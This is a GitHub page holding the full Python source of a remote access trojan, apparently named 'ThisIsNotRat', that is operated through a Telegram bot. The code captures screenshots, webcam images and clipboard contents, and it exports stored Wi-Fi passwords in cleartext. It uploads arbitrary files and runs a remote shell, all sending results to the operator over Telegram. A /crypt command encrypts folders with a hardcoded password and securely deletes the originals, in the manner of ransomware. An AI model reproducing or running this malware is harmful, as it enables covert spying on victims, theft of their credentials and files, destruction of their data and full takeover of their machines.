forked from theriturajps/ThisIsNotRat
-
Notifications
You must be signed in to change notification settings - Fork 0
/
ThisIsNotRat.py
386 lines (294 loc) · 13 KB
/
ThisIsNotRat.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
import os
import re
import mss
import cv2
import time
import pyttsx3
import telebot
import platform
import clipboard
import subprocess
import pyAesCrypt
import xml.etree.ElementTree as ET
from secure_delete import secure_delete
TOKEN = '*************:**************-**************_**-*'
bot = telebot.TeleBot(TOKEN)
cd = os.path.expanduser("~")
secure_delete.secure_random_seed_init()
bot.set_webhook()
@bot.message_handler(commands=['start'])
def start(message):
bot.send_message(message.chat.id, 'Welcome! To The RAT\n\nMade by @RituRajPS')
@bot.message_handler(commands=['help'])
def help_msg(message):
help_text = 'Send /screen to capture screenshot.\n/sys to get system information.\n/ip to get ip adress.\n/cd to navigate in folders. \n/ls for list élements. \n/upload [path] to get file.\n/crypt [path] for crypt folders files. /decrypt [path] \n/webcam \n/lock \n /clipboard \n/shell \n/wifi \n/speech [hi] \n/shutdown'
bot.send_message(message.chat.id, help_text)
@bot.message_handler(commands=['screen'])
def send_screen(message):
with mss.mss() as sct:
sct.shot(output=f"{cd}\capture.png")
image_path = f"{cd}\capture.png"
print(image_path)
with open(image_path, "rb") as photo:
bot.send_photo(message.chat.id, photo)
@bot.message_handler(commands=['ip'])
def send_ip_info(message):
try:
command_ip = "curl ipinfo.io/ip"
result = subprocess.check_output(command_ip, shell=True)
public_ip = result.decode("utf-8").strip()
bot.send_message(message.chat.id, public_ip)
except:
bot.send_message(message.chat.id, 'error')
@bot.message_handler(commands=['sys'])
def send_system_info(message):
system_info = {
'Platform': platform.platform(),
'System': platform.system(),
'Node Name': platform.node(),
'Release': platform.release(),
'Version': platform.version(),
'Machine': platform.machine(),
'Processor': platform.processor(),
'CPU Cores': os.cpu_count(),
'Username': os.getlogin(),
}
system_info_text = '\n'.join(f"{key}: {value}" for key, value in system_info.items())
bot.send_message(message.chat.id, system_info_text)
@bot.message_handler(commands=['ls'])
def list_directory(message):
try:
contents = os.listdir(cd)
if not contents:
bot.send_message(message.chat.id, "folder is empty.")
else:
response = "Directory content :\n"
for item in contents:
response += f"- {item}\n"
bot.send_message(message.chat.id, response)
except Exception as e:
bot.send_message(message.chat.id, f"An error occurred : {str(e)}")
@bot.message_handler(commands=['cd'])
def change_directory(message):
try:
global cd
args = message.text.split(' ')
if len(args) >= 2:
new_directory = args[1]
new_path = os.path.join(cd, new_directory)
if os.path.exists(new_path) and os.path.isdir(new_path):
cd = new_path
bot.send_message(message.chat.id, f"you are in : {cd}")
else:
bot.send_message(message.chat.id, f"The directory does not exist.")
else:
bot.send_message(message.chat.id, "Incorrect command usage. : USE /cd [folder name]")
except Exception as e:
bot.send_message(message.chat.id, f"An error occurred : {str(e)}")
@bot.message_handler(commands=['upload'])
def handle_upload_command(message):
try:
args = message.text.split(' ')
if len(args) >= 2:
file_path = args[1]
if os.path.exists(file_path):
with open(file_path, 'rb') as file:
bot.send_document(message.chat.id, file)
bot.send_message(message.chat.id, f"File has been transferred successfully.")
else:
bot.send_message(message.chat.id, "The specified path does not exist.")
else:
bot.send_message(message.chat.id, "Incorrect command usage. Use /upload [PATH]")
except Exception as e:
bot.send_message(message.chat.id, f"An error occurred : {str(e)}")
@bot.message_handler(commands=['crypt'])
def encrypt_folder(message):
try:
if len(message.text.split()) >= 2:
folder_to_encrypt = message.text.split()[1]
password = "fuckyou"
for root, dirs, files in os.walk(folder_to_encrypt):
for file in files:
file_path = os.path.join(root, file)
encrypted_file_path = file_path + '.crypt'
pyAesCrypt.encryptFile(file_path, encrypted_file_path, password)
if not file_path.endswith('.crypt'):
secure_delete.secure_delete(file_path)
bot.send_message(message.chat.id, "Folder encrypted, and original non-encrypted files securely deleted successfully.")
else:
bot.send_message(message.chat.id, "Incorrect command usage. Use /crypt [FOLDER_PATH]")
except Exception as e:
bot.send_message(message.chat.id, f"An error occurred : {str(e)}")
@bot.message_handler(commands=['decrypt'])
def decrypt_folder(message):
try:
if len(message.text.split()) >= 2:
folder_to_decrypt = message.text.split()[1]
password = "fuckyou"
for root, dirs, files in os.walk(folder_to_decrypt):
for file in files:
if file.endswith('.crypt'):
file_path = os.path.join(root, file)
decrypted_file_path = file_path[:-6]
pyAesCrypt.decryptFile(file_path, decrypted_file_path, password)
secure_delete.secure_delete(file_path)
bot.send_message(message.chat.id, "Folder decrypted, and encrypted files deleted successfully..")
else:
bot.send_message(message.chat.id, "Incorrect command usage. Use /decrypt [ENCRYPTED_FOLDER_PATH]")
except Exception as e:
bot.send_message(message.chat.id, f"An error occurred : {str(e)}")
@bot.message_handler(commands=['lock'])
def lock_command(message):
try:
result = subprocess.run(["rundll32.exe", "user32.dll,LockWorkStation"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if result.returncode == 0:
bot.send_message(message.chat.id, "windows session succefuly locked.")
else:
bot.send_message(message.chat.id, "Impossible to lock windows session.")
except Exception as e:
bot.send_message(message.chat.id, f"An error occurred : {str(e)}")
shutdown_commands = [
['shutdown', '/s', '/t', '5'],
['shutdown', '-s', '-t', '5'],
['shutdown.exe', '/s', '/t', '5'],
['shutdown.exe', '-s', '-t', '5'],
]
@bot.message_handler(commands=['shutdown'])
def shutdown_command(message):
try:
success = False
for cmd in shutdown_commands:
result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if result.returncode == 0:
success = True
break
if success:
bot.send_message(message.chat.id, "shutdown in 5 seconds.")
else:
bot.send_message(message.chat.id, "Impossible to shutdown.")
except Exception as e:
bot.send_message(message.chat.id, f"An error occurred : {str(e)}")
@bot.message_handler(commands=['webcam'])
def capture_webcam_image(message):
try:
cap = cv2.VideoCapture(0)
if not cap.isOpened():
bot.send_message(message.chat.id, "Error: Unable to open the webcam.")
else:
ret, frame = cap.read()
if ret:
cv2.imwrite("webcam.jpg", frame)
with open("webcam.jpg", 'rb') as photo_file:
bot.send_photo(message.chat.id, photo=photo_file)
os.remove("webcam.jpg")
else:
bot.send_message(message.chat.id, "Error while capturing the image.")
cap.release()
except Exception as e:
bot.send_message(message.chat.id, f"An error occurred: {str(e)}")
@bot.message_handler(commands=['speech'])
def text_to_speech_command(message):
try:
text = message.text.replace('/speech', '').strip()
if text:
pyttsx3.speak(text)
bot.send_message(message.chat.id, "succesful say.")
else:
bot.send_message(message.chat.id, "Use like this. Utilisez /speech [TEXTE]")
except Exception as e:
bot.send_message(message.chat.id, f"An error occurred : {str(e)}")
@bot.message_handler(commands=['clipboard'])
def clipboard_command(message):
try:
clipboard_text = clipboard.paste()
if clipboard_text:
bot.send_message(message.chat.id, f"Clipboard content :\n{clipboard_text}")
else:
bot.send_message(message.chat.id, "clipboard is empty.")
except Exception as e:
bot.send_message(message.chat.id, f"An error occurred : {str(e)}")
user_states = {}
STATE_NORMAL = 1
STATE_SHELL = 2
@bot.message_handler(commands=['shell'])
def start_shell(message):
user_id = message.from_user.id
user_states[user_id] = STATE_SHELL
bot.send_message(user_id, "You are now in the remote shell interface. Type 'exit' to exit.")
@bot.message_handler(func=lambda message: get_user_state(message.from_user.id) == STATE_SHELL)
def handle_shell_commands(message):
user_id = message.from_user.id
command = message.text.strip()
if command.lower() == 'exit':
bot.send_message(user_id, "Exiting remote shell interface.")
user_states[user_id] = STATE_NORMAL
else:
try:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if stdout:
output = stdout.decode('utf-8', errors='ignore')
bot.send_message(user_id, f"Command output:\n{output}")
if stderr:
error_output = stderr.decode('utf-8', errors='ignore')
bot.send_message(user_id, f"Command error output:\n{error_output}")
except Exception as e:
bot.send_message(user_id, f"An error occurred: {str(e)}")
def get_user_state(user_id):
return user_states.get(user_id, STATE_NORMAL)
@bot.message_handler(func=lambda message: get_user_state(message.from_user.id) == STATE_SHELL)
def handle_shell_commands(message):
user_id = message.from_user.id
command = message.text.strip()
if command.lower() == 'exit':
bot.send_message(user_id, "Exiting remote shell interface.")
user_states[user_id] = STATE_NORMAL
else:
try:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if stdout:
output = stdout.decode('utf-8', errors='ignore')
send_long_message(user_id, f"Command output:\n{output}")
if stderr:
error_output = stderr.decode('utf-8', errors='ignore')
send_long_message(user_id, f"Command error output:\n{error_output}")
except Exception as e:
bot.send_message(user_id, f"An error occurred: {str(e)}")
def send_long_message(user_id, message_text):
part_size = 4000
message_parts = [message_text[i:i+part_size] for i in range(0, len(message_text), part_size)]
for part in message_parts:
bot.send_message(user_id, part)
@bot.message_handler(commands=['wifi'])
def get_wifi_passwords(message):
try:
subprocess.run(['netsh', 'wlan', 'export', 'profile', 'key=clear'], shell=True, text=True)
with open('Wi-Fi-App.xml', 'r') as file:
xml_content = file.read()
ssid_match = re.search(r'<name>(.*?)<\/name>', xml_content)
password_match = re.search(r'<keyMaterial>(.*?)<\/keyMaterial>', xml_content)
if ssid_match and password_match:
ssid = ssid_match.group(1)
password = password_match.group(1)
message_text = f"SSID: {ssid}\nPASS: {password}"
bot.send_message(message.chat.id, message_text)
try:
os.remove("Wi-Fi-App.xml")
except:
pass
else:
bot.send_message(message.chat.id, "NOT FOUND.")
except Exception as e:
bot.send_message(message.chat.id, f"An error occurred : {str(e)}")
try:
if __name__ == "__main__":
print('Waiting for commands...')
try:
bot.infinity_polling()
except:
time.sleep(10)
pass
except:
time.sleep(5)
pass